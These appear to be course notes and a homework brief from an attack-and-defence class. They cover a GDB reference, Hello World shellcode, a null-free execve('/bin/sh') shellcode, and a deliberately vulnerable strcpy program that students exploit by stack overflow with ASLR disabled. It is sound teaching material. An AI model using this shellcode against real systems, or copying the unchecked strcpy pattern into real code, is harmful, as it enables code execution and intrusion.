# Notes for TalTech A&D course

Exercises:

Homework:

• Homework - deadline 1st of December, 23:59

## GDB reference

CommandDescription
gdb ./fileopen file <file> in gdb
break mainbreak at function eg. <main>
runstart debugging
si/stepistep into (eg. step into function)
ni/nextistep over (does not enter function, steps over it)
info breakpointsexamine breakpoints
p $rbpprint the value of$rbp
p $rbp-0x8print the value of$rbp-0x8
x/x $rbpprint the value in hex at$rbp
x/x 0x7fffffffdda8print the value in hex at address
x/i $rbpprint the assembly instructions at address x/8bx$rbp-0x28display 8 bytes in hex beginning from address at $rbp-0x28 ## Hello World! in data section ; ssize_t write(int fd, const void *buf, size_t count); ; Write a program which displays Hello World ;STEP 1 - global directive, program entry point, sections global _start: section .text _start: ;STEP 2 - fd needs to be set to 1 (stdout) mov dil, 0x1 ;STEP 3 - pointer to a buffer needs to point to a string we want to print to the stdout mov rsi, message ;STEP 4 - count needs to be set to number of bytes we want to print to stdout "Hello World!" + new line = 13 dec or 0xd in hex add rdx, 0xd ;STEP 5 - RAX needs to hold the syscall number we want to execute, call syscall add rax, 0x1 syscall ;STEP 6 - exit() syscall xor rdi, rdi mov al, 0x3c syscall section .data message: db 'Hello World!', 0xa  ## Hello World JCP technique 2.1 with NULL bytes ; JMP-CALL-POP technique ; Write a program to display Hello World! ; 0xa - creates a new line character after the Hello World! string ; remove null bytes global _start section .text _start: jmp callshell shellcode: pop rsi mov rdx, 0xd add rdi, 1 mov rax, 0x1 syscall exit: mov rax, 0x3c syscall callshell: call shellcode msg: db 'Hello World!', 0xa  2.2 without NULL bytes, but it doesn’t work in our test shellcode program, why? Find out in GDB, that some registers do not have expected values before the 1st syscall is executed. ; JMP-CALL-POP technique ; Write a program to display Hello World! ; 0xa - creates a new line character after the Hello World! string ; remove null bytes global _start section .text _start: jmp callshell shellcode: pop rsi mov dl, 0xd add dil, 1 mov al, 0x1 syscall exit: mov al, 0x3c syscall callshell: call shellcode msg: db 'Hello World!', 0xa  2.3 Final shellcode using JCP technique: ; JMP-CALL-POP technique ; Write a program to display Hello World! ; 0xa - creates a new line character after the Hello World! string ; remove null bytes global _start section .text _start: jmp callshell shellcode: pop rsi xor rdx, rdx mov dl, 0xd xor rdi, rdi add rdi, 1 xor rax, rax mov al, 0x1 syscall exit: mov al, 0x3c syscall callshell: call shellcode msg: db 'Hello World!', 0xa  ## Execve global _start section .text _start: ; int execve(const char *filename, char *const argv[], ; char *const envp[]); mov rbx, 0x68732f6e69622f2f xor rdx, rdx push rdx push rbx mov rdi, rsp push rdx push rdi mov rsi, rsp ;syscall xor rax, rax mov al, 0x3b syscall  ## Buffer overflow Disable ASLR: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space Compile the file gcc -fno-stack-protector -z execstack buffer.c -o buffer Commands: • nasm -felf64 shellcode.nasm -o shellcode.o • ld shellcode.o -o shellcode • gethex shellcode • in GDB to calculate the number of bytes between 2 addresses p/d 0xXXXXXXX-0xYYYYYYYY ## Homework ### Task description: • Step 1. Write a shellcode which prints out your name/nickname. Remove any NULL bytes and keep the shellcode as short as possible. To write the shellcode you basically only need to know how to use the write() and exit() syscalls • Step 2. Exploit the buffer overflow in the buffer.c program so that as a result, the shellcode you wrote in step 1 would get executed. Vulnerable buffer.c program Disable ASLR: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space Compile program: gcc -fno-stack-protector -z execstack buffer.c -o buffer buffer.c #include <stdlib.h> #include <stdio.h> #include <string.h> int foo(char *str) { char buffer[100]; printf("%p\n",buffer); strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[400]; FILE *secretfile; secretfile = fopen("secretfile", "r"); fread(str, sizeof(char), 300, secretfile); foo(str); printf("All good\n"); return 1; }  Run the program: ./buffer $ ./buffer
0x7fffffffdbb0
All good


### Solution path

Step 1:

• Shellcode, when run independently, should print out your name/nickname as follows:
$./name Silvia  • Use objdump -d -M intel <filename> to verify that your shellcode does not have any NULL bytes • gethex <filename> to dump the shellcode as a hex string, to use in the exploit in step 2 Step 2: • Use the dumped shellcode in your payload to exploit the vulnerable buffer.c program Rough bulletpoints what you should know to complete the task: • How is the user input consumed in the vulnerable program? • Vulnerability. Which buffer is overflown? • Start address of that buffer? • Address of the RIP to overwrite? • Vulnerable program “buffer” should produce the following output when run: $ ./buffer
0x7fffffffdbb0
Silvia


Send it to: <silviavali14[at]gmail[dot]com>
Title of email: Student code, firstname lastname

Email should contain:

• Source code of the shellcode that prints out your name/nickname
• Source code of exploit code used to complete step 2

Rules !!!

1. Any homework that does not arrive in my mailbox by the set deadline is counted as not solved.
2. If you submit your homework multiple times, last one is the one that counts.
3. In order to complete the homework, both tasks (shellcode and buffer overflow exploitation) have to be done and sent to my e-mail. No points are given for half a solution. It either works and you get 10 points or it doesn’t and you get a 0.